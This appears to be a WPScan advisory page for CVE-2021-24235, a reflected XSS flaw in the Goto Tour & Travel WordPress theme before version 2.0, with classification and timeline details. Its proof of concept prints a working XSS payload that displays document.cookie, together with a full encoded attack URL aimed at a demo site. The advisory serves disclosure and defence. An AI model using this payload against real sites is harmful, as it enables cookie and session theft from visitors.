logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Goto - Tour & Travel < 2.0 - Unauthenticated Reflected XSS

Description

The theme does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.

Proof of Concept

Payload: <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);//>

https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&avaibility=13

Affects Themes

goto

Fixed in version 2.0

References

CVE

CVE-2021-24235

URL

https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website

https://m0ze.ru

Submitter twitter

vladm0ze

Verified

Yes

WPVDB ID

eece90aa-582b-4c49-8b7c-14027f9df139

Timeline

Publicly Published

2021-03-31 (about 7 months ago)

Added

2021-03-31 (about 7 months ago)

Last Updated

2021-04-01 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin